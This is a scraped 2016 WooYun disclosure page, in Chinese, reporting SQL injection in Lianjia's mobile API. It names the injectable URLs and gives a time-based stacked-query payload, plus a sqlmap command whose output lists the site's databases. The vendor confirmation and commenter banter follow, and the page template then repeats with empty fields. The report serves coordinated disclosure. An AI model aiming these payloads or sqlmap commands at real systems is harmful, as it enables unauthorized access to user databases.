链家网另一处SQL注入漏洞(主站数据库) | wooyun-2016-0200388| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200388

漏洞标题：链家网另一处SQL注入漏洞(主站数据库)

漏洞作者：猪猪侠

提交时间：2016-04-25 11:03

修复时间：2016-06-10 21:00

公开时间：2016-06-10 21:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-25：细节已通知厂商并且等待厂商处理中
2016-04-26：厂商已经确认，细节仅向厂商公开
2016-05-06：细节向核心白帽子及相关领域专家公开
2016-05-16：细节向普通白帽子公开
2016-05-26：细节向实习白帽子公开
2016-06-10：细节向公众公开

简要描述：

链家网另一处SQL注入漏洞(主站数据库)，同类型的漏洞
做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。

详细说明：

下面漏洞的延续，测试已经补丁好了
WooYun: 链家网存在SQL注入漏洞(主站数据库/3300万用户)
新的注入点
http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051
API接口换个名字，一个同类型的漏洞
PS：
这个接口的
http://m.api.lianjia.com/house/ershoufang/detail?house_code=code&share_agent_ucid=*
的share_agent_ucid 参数也存在
GET parameter 'share_agent_ucid' seems to be 'MySQL > 5.0.11 stacked queries' injectable
share_agent_ucid=1); SELECT SLEEP(5)--

漏洞证明：

python sqlmap.py -u "http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051" --dbs

available databases [8]:
[*] `session`
[*] baichuan
[*] hdic
[*] information_schema
[*] lianjia
[*] salesmgmt
[*] test
[*] usermgr

修复方案：

补补补

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-04-26 20:51

厂商回复：

第一处确认不存在注入，后补充的基于时间。
感谢！

漏洞评价：

评价

2016-04-25 11:03 | 猪猪侠 ( 核心白帽子 | Rank:5322 漏洞数:410 | 你都有那么多超级棒棒糖了，还要自由干吗？)

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。
2016-04-25 11:04 | 牛小帅 ( 普通白帽子 | Rank:1577 漏洞数:378 | bye)

这不是因为你有很多棒棒糖嘛
2016-04-25 11:05 | 心云 ( 普通白帽子 | Rank:440 漏洞数:112 | 有追求，才会有提高！尽快达到下一个目标!)

@猪猪侠膜拜猪哥
2016-04-25 11:06 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

@猪猪侠那你就不能轻点挖洞！
2016-04-25 11:10 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

猪哥666
2016-04-25 12:40 | ning1022 ( 普通白帽子 | Rank:183 漏洞数:74 | 技术万能，技术万万不能！)

估计鸟哥会邀请猪哥参加PHP大会。
2016-04-25 16:20 | adminss ( 路人 | Rank:8 漏洞数:5 | 大菜逼)

@猪猪侠膜拜猪哥，第一天来到wooyun，好兴奋。
2016-04-25 16:55 | 要飞 ( 路人 | Rank:12 漏洞数:2 | 飞飞飞，太胖飞不起来)

股市又跌了？
2016-04-25 18:04 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。
2016-04-25 19:57 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。不说了,我去补BUG了
2016-04-26 14:40 | 87技术联盟-Jack ( 路人 | Rank:12 漏洞数:6 | 来自于浩瀚网络中的小白！)

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。不说了,我去补BUG了
2016-04-29 17:27 | 穿墙人 ( 路人 | Rank:15 漏洞数:1 | 坚持-共享-开源-自由)

@猪猪侠膜拜猪哥
2016-05-07 14:41 | Coco413 ( 路人 | Rank:8 漏洞数:2 | 种一棵树最好的时机是十年前，其次是现在！)

膜拜一波- -

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200388

漏洞标题：链家网另一处SQL注入漏洞(主站数据库)

相关厂商：链家网

漏洞作者：猪猪侠

提交时间：2016-04-25 11:03

修复时间：2016-06-10 21:00

公开时间：2016-06-10 21:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200388

漏洞标题：链家网另一处SQL注入漏洞(主站数据库)

相关厂商：链家网

漏洞作者： 猪猪侠

提交时间：2016-04-25 11:03

修复时间：2016-06-10 21:00

公开时间：2016-06-10 21:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0200388"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云